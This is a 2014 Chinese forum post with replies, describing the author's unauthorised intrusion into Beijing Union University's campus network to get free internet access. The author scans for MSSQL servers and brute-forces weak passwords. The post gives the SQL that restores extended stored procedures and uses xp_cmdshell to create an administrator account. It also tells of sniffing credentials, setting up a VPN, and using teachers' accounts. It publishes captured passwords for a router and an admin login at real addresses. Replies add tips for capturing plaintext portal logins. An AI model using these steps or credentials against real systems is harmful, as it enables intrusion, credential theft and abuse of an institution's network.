首页
社区
课程
招聘
[原创]北京联合大学内网渗透小记
发表于: 2014-9-28 15:09 17874

[原创]北京联合大学内网渗透小记

2014-9-28 15:09
17874

故事前景:
目前来到北京联合大学学习逆向工程,教室的局域网实在太卡,所以打起了校园无线网BUU的主意.但没有学号登录,只能另避蹊径想办法绕过验证.下面开始展开小逸的内网渗透之旅,没啥技术含量,大牛请飘过...



校园内网渗透有几个思路,WEB渗透,MSQSQL弱口令提权,MYSQL弱口令提权,3389爆破...等.小逸就先从数据库弱口令开始吧.请出短小精悍的S扫描器,扫局域网网段内的1433端口,



扫出IP后整理成文本用scan(图片中我重命名了scan)挂字典批量扫MSSQL弱口令.



开始穷举字典中的密码,匹配的保存为M.txt文本



弱口令出来了,用SQL查询分析器(修正版)连接数据库,利用常用存储扩展提权,提权的代码度娘上泛滥.我会上传在附件中.
先查看是否开启终端(不开启用命令开启),终端端口为多少
查看3389端口
exec xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp','PortNumber'



恢复时一些常用的SQL语句:
利用sp_addextendedproc恢复大部分常用存储扩展(得先利用最顶上的语句恢复自己):
use master   
exec sp_addextendedproc xp_cmdshell,'xp_cmdshell.dll'   
exec sp_addextendedproc xp_dirtree,'xpstar.dll'   
exec sp_addextendedproc xp_enumgroups,'xplog70.dll'   
exec sp_addextendedproc xp_fixeddrives,'xpstar.dll'   
exec sp_addextendedproc xp_loginconfig,'xplog70.dll'   
exec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll'   
exec sp_addextendedproc xp_getfiledetails,'xpstar.dll'   
exec sp_addextendedproc sp_OACreate,'odsole70.dll'   
exec sp_addextendedproc sp_OADestroy,'odsole70.dll'   
exec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll'   
exec sp_addextendedproc sp_OAGetProperty,'odsole70.dll'   
exec sp_addextendedproc sp_OAMethod,'odsole70.dll'   
exec sp_addextendedproc sp_OASetProperty,'odsole70.dll'   
exec sp_addextendedproc sp_OAStop,'odsole70.dll'   
exec sp_addextendedproc xp_regaddmultistring,'xpstar.dll'   
exec sp_addextendedproc xp_regdeletekey,'xpstar.dll'   
exec sp_addextendedproc xp_regdeletevalue,'xpstar.dll'   
exec sp_addextendedproc xp_regenumvalues,'xpstar.dll'   
exec sp_addextendedproc xp_regread,'xpstar.dll'   
exec sp_addextendedproc xp_regremovemultistring,'xpstar.dll'   
exec sp_addextendedproc xp_regwrite,'xpstar.dll'   
exec sp_addextendedproc xp_availablemedia,'xpstar.dll'



xp_cmdshell添加用户:
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
exec master.dbo.xp_cmdshell 'net user CkDebug 123456 /add'
exec master.dbo.xp_cmdshell 'net localgroup administrators CkDebug /add'



成功建立帐号 CkDebug \123456



表中不少敏感信息,怕被查水表我就不贴全图了.(仅供测试,过后我会把帐号删除)



价值不大,不过目的已经达到,最终小逸建立了VPN达到了绕过验证上网的目的.
基本上扫出的弱口令都能提权,下面贴下几个图



(16核心8G服务器)



(计费管理系统)
思路和手法都一样,我就不重复了.目的也已经达到,架设了VPN免费上网..但美中不足的是被限速了,服务器里下载速度可以达到100M独享,本地链接服务器VPN只是100KB左右(听说上一期师兄也用服务器代理,下载速度也是60M每秒.前段时间被管理员发现了所以限速了)我猜想是连接到BUU无线这被限制了速度,接入内网的时候限速了.想到两个解决思路.第一接WAN(教室内有网线,教室附近有机箱.弄个迷你路由接有限然后ap热点.).第二继续渗透路由,修改限速.(毕竟第一个比较危险,被发现的时候一抓一个准).

在服务器中嗅探抓包.





card.buu.edu.cn/homeLogin.action是校园卡查询系统,嗅探到帐号(学号和密码),最后经过测试,校园卡一卡通的帐号能查询饭卡,登录BUU验证等,作用很大....(工号位数比较短的是教师的工号,最后发现,这工号作用很大)



嗅探出
http://192.168.192.14/web   路由
root   bshdl-97h





嗅探出http://1.202.89.6/muc/login.action
admin  MUNCAdministrator



嗅探出的敏感密码太多 我就不一一列举了,下面小逸就讲讲利用嗅探到的密码继续渗透



利用得到的工号和密码登录上了BUU.又一个办法免费上网了....



在外网可以利用教师的工号登录SSL VPN
















收集这些信息要是被有心人社工,估计,,,,,

MYSQL弱口令也测试过,利用查询命令也可以root.
还有不少敏感的网址和密码我就不一一截图了,既然目的已经达到了,就风扯吧,此次渗透只是测试,已经把日志和所建的帐号删除,请大大勿跨省.


[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

上传的附件:
收藏
免费 0
支持
分享
最新回复 (67)
雪    币: 1491
活跃值: (985)
能力值: (RANK:860 )
在线值:
发帖
回帖
粉丝
2
楼主,你的图片全部看不到,重新编辑一下吧
2014-9-28 16:05
0
雪    币: 1933
活跃值: (113)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
3
顶一个 ,很牛 的  说  !!
2014-9-28 16:28
0
雪    币: 10
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
4
图片全挂了
2014-9-28 16:47
0
雪    币: 14983
活跃值: (5285)
能力值: ( LV15,RANK:880 )
在线值:
发帖
回帖
粉丝
5
图挂了~~
2014-9-28 17:21
0
雪    币: 42
活跃值: (196)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
6
能看到呀 没挂
2014-9-28 20:49
0
雪    币: 4801
活跃值: (4219)
能力值: ( LV8,RANK:138 )
在线值:
发帖
回帖
粉丝
7
膜拜……………………
2014-9-28 21:20
0
雪    币: 178
活跃值: (125)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
8
哈哈,牛犇啊。不鸣则已一鸣惊人!!
2014-9-28 21:45
0
雪    币: 29
活跃值: (16)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
9
图片恢复了。。
2014-9-28 22:01
0
雪    币: 0
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
10
额,思路挺正规
2014-9-28 22:16
0
雪    币: 60
活跃值: (11)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
11
前几步骤,好熟悉啊,当初社工校内的时候,不敢搞数据库,“擦不干净屁股” 就危险了。
不得不说 楼主胆子很大啊。
2014-9-28 22:50
0
雪    币: 136
活跃值: (16)
能力值: ( LV3,RANK:30 )
在线值:
发帖
回帖
粉丝
12
谁人年少不轻狂,加个好友以后多多交流.
2014-9-28 23:16
0
雪    币: 9723
活跃值: (2536)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
13
想起以前搞网吧给自己冲会员冲Q币的日子
2014-9-28 23:52
0
雪    币: 209
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
14
支持原创作品。
2014-9-29 08:37
0
雪    币: 7
活跃值: (35)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
15
这样还说没什么技术。。膜拜。。
2014-9-29 17:15
0
雪    币: 68
活跃值: (30)
能力值: ( LV3,RANK:20 )
在线值:
发帖
回帖
粉丝
16
十月一号 我也要过来了 师兄 你真厉害 求带
2014-9-29 17:33
0
雪    币: 40
活跃值: (145)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
17
要怪就怪做认证的人权限没搞好,学生没认证前竟然可以访问内网,而且这个认证还用http,不用https,这样账号密码直接用无线网卡都可以在空口中抓,都不用连接认证学校网络
2014-9-29 22:39
0
雪    币: 136
活跃值: (16)
能力值: ( LV3,RANK:30 )
在线值:
发帖
回帖
粉丝
18
基本校园内网的热点都是无验证访问,然后再用学号和密码登录.可能是我去过的大学比较少吧,昆明理工,云南师大,云南大学,桂林理工的校园网都如此.
kali外置网卡抓包我试过,抓不到数据...
大神,来点思路,我试试能不能换种方式拿到上网密码....
2014-9-29 22:43
0
雪    币: 40
活跃值: (145)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
19
无验证访问那么无线数据包在空气中传播就是明文的了,然后那个弹出网页的类似cmcc的就是portal认证。portal认证要是不是https加密的话,用户密码也可以抓出来,不过自己分析要熟悉portal协议,反正这个学校就是无线明文+portal明文,肯定直接抓空口包可以抓到账号密码的
2014-9-29 22:53
0
雪    币: 0
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
20
2014-10-3 23:58
0
雪    币: 43
活跃值: (40)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
21
思路很清晰,楼主学逆向,却搞了渗透,呵呵,难道北京联合大学在信息安全领域这么 强?
2014-10-6 22:17
0
雪    币: 144
活跃值: (46)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
22
楼主记得打码
2014-10-11 18:15
0
雪    币: 135
活跃值: (63)
能力值: ( LV5,RANK:60 )
在线值:
发帖
回帖
粉丝
23
学习学习,很不错。
2014-10-11 19:21
0
雪    币: 118
活跃值: (72)
能力值: ( LV4,RANK:50 )
在线值:
发帖
回帖
粉丝
24
本来是同学,现在你成了我的学长了。15
2014-10-11 20:43
0
雪    币: 65
活跃值: (27)
能力值: ( LV5,RANK:60 )
在线值:
发帖
回帖
粉丝
25
15pb?我是你1期的,加个好友以后多交流呀。我在群里叫大米
2014-10-11 21:00
0
游客
登录 | 注册 方可回帖
返回
//